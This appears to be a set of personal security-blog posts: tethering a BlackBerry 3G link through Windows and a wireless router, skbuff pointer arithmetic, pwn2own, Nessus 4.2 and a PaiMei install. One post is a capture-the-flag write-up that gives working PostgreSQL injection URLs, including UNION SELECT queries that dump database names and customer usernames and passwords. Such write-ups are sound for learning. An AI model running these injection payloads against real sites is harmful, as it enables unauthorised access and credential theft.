Let’s assess the situation: You have a 3G phone which allows tethering, a windows machine, a wireless access point and another PC that is connected to the LAN port of the wireless access point (or typically called a wireless router). The wireless access point is a home network and your ISP decides to disconnect your signal or is experiencing some problems. How do you share your 3G connection, so that other computers can connect through the wireless AP and use your cell phone’s 3G connection? It’s actually quite simple.
Tether your smartphone (in this case let’s say blackberry). Blackberry tethering in Windows over AT&T is allowed using a software called AT&T Communication Manager. Install ACM, and connect your Windows machine using a mini-USB cable to your phone. Goto Start->Run->cmd.exe. Type ipconfig /all to see the IP address and the DNS servers IP addresses.
Now connect the WAN link of your Wireless access point to this Windows machine’s ethernet port. Setup a static IP for this Windows machine say 192.168.10.1 with a netmask of 255.255.255.0. Now go to Network connections (from Control Panel), right click on the Mobile connection representing your blackberry, click on Advanced. In the Internet Connection Sharing section, check the box that says “Allow other network users to connect through this computer’s Internet connection” and select “Local Area Connection” (this is the same connection you connected to the WAN port of the wireless AP). Click OK. You may have to disconnect and reconnect your ACM connection to allow the settings to take effect.
Now that this is done, connect to the administration interface of the wireless access point to the other PC that is connected to the LAN port (or through the wireless) to the access point. Go to the administration interface of the wireless AP, and set a static IP for the router in the same subnet as with the Windows box (the one you set with 192.168.10.1). Set the static IP on the AP to be say 192.168.10.2 (remember this has to be the same subnet), netmask as 255.255.255.0 and then the most important, the default gateway to 192.168.10.1 (the IP of the windows box on the ethernet card). To set the DNS server addresses, use the same addresses you found using ipconfig /all in the first step. Otherwise you could also use open DNS servers or any other DNS servers but it’ll be best to use the DNS servers pointing to the ones used by the tethered connection because you can rule out DNS issues if something isn’t working and it comes down to troubleshooting. Once on the router, the static is set, the gateway is set, the DNS is set, you should be able to connect from your wireless network to the internet through your 3G connection! 🙂
Happy internet sharing! 🙂
Here is a schematic diagram:
[tethering] [static IP] [static IP] [internal IP] [DHCP address]
| | | |
[ phone ] <==> [Windows machine]:eth0 <==> wan:[Wireless AP]:lan <==> [client]
Yesterday was a fantastic day trying to get the IP data field to be pointed to by in the skbuff structure. The documentation in the files did not help make things clearer.
The situation was where I was supposed to use the
unsigned char* data field in the skbuff structure to point to the IP data starting point.
Tried a lot of pointer math and the following finally worked:
IP Data pointer location:
unsigned char * ptr = sb->data +
sb->nh.iph->ihl*4;
int byte_size = ntohs(sb->nh.iph->tot_len) –
sb->nh.iph->ihl*4;
In fact, Vinay Reddy (vinayvinay@gmail.com) suggested something which I think was even better than the stuff that was working for me. He said the pointer value should be:
unsigned char * ptr = sb->nh.iph->raw + sb->nh.iph->ihl*4;
I think this actually grabs the gist of what I exactly want to do.
I *really* want to point with respect to the IP Header. I do not really care about where sb->data really points to so I guess Vinay’s method is much better. Haven’t implemented it so I really don’t know but sounds the most logical!
– Rajat
http://www-scf.usc.edu/~swarup/
Seems like the pwn2own this time around is going to be putting up prizes of about $100,000+ for people who can find 0-days for a variety of platforms. Especially, the fact that about $60,000 are being devoted for 0-days on the mobile security platform including the android platform etc., indicates a new era of security bugs.
The iPhone (non-jailbroken ones) as well as the BlackBerry application do tend to use signed executables. One only hopes that like the trust-relationships of the SSL-based certificates, the trust is really kept by analyzing the blackberry and iPhone apps.
Tyler Shields from Veracode presented his work of TXSBBSpy (source code URL: http://www.veracode.com/images/txsBBSpy.java; Presentation slides: http://www.veracode.com/images/TylerShields-MonkeyBerries-ShmooCon-2010.pdf). In this he suggested that when controlled APIs are used the code needs to be signed by RIM but to do that RIM only gets the hash and not the source code. This presents an interesting situation where RIM could actually be signing something that they don’t really know what it seems to be doing.
Interestingly enough, I found last week that the new Nessus 4.2.0 works by default as a web interface. Gone are the days of using the NessusClient and connecting to TCP port 1241 and using it to connect to the nessusd. Connecting to local TCP port 8834 (https://localhost:8834) brings you to a web interface that you can use to connect to the new Nessus daemon. The nesssusd listener does not even listen on port 1241 by default.
I’ll shortly get used to it but I know the transition would be slow for me …. after it takes getting used to when you completely change the architecture after maintaining it for at least a good 7 years or so!
This was an interesting PostgreSQL injection challenge.
What is Jeff Moss’ checking account balance?
Bank Site – http://140.197.217.85:8080/boa_bank
User:blacksheep
Password:luvMeSomeSheep
The username and password is to get around the .htaccess that protects the site. There was a page with the zip code search on it. The zip parameter was vulnerable to SQL injection (verified by entering a ‘ character in the zip parameter). With this information you
SQL injection in zip parameter. http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20or%201=1–&Submit.x=0&Submit.y=0
List of databases can be found by: http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20datname,datname,datname,datname,1,datname%20FROM%20pg_database&Submit.x=0&Submit.y=0
Names of databases
——————
template1
template0
postgres
boa_bank
With this query it’s easy to evaluate the type of the parameter as well as the position. This was done by the error message that indicated an “int cannot be compared to text”.
Table,column_name
—————–
transaction,amount
transaction,account
transaction,id
transaction,date
branch,id
branch,zip
branch,city
branch,name
branch,street
branch,phone
branch,state
customer,id
customer,firstname
customer,password
customer,lastname
customer,username
customer,email
account,id -> int
account,owner -> int
account,account -> string
account,balance
account,type -> checking/savings
sqlmapfile,data
test2234,t
hkk,t
mydata,t
mytable,mycol
hk,hk
sonic,sonic
Getting all customers (Jeff Moss can’t be found in the list though)
http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20C.firstname,C.lastname,C.username,C.password,1,C.email%20FROM%20customer%20C&Submit.x=0&Submit.y=0
Lots of complaints were heard that the record wasn’t present for Jeff Moss. But if you just filtered by ‘checking’ account, you would see that it was all the same for all users. The following query gives the list of all checking accounts…but if you notice the value is $0.00 for all checking accounts so Jeff Moss’ account should be 0.00 too!!!
Fun times!
I was playing with PaiMei and trying to get some initial stuff working on Pai Mei Reverse Engineering framework by Pedram Amini.
It was a smooth ride until the following steps:
1. Install MySQL
2. Install wxPython
3. Install GDE and uDraw
There was a slight problem in the __install_requirements.py file that it would always look at C:\Program Files for the files whereas my files were in S:\Program Files.
Either way a small change from C to S in the __install_requirements.py did the trick. Thereafter, when I ran __setup_mysql.py script I got the following error:
Seems like MySQL should not be running in “strict” mode while you run this script. I got this information from the following link:
http://paimei.openrce.org:8000/ticket/5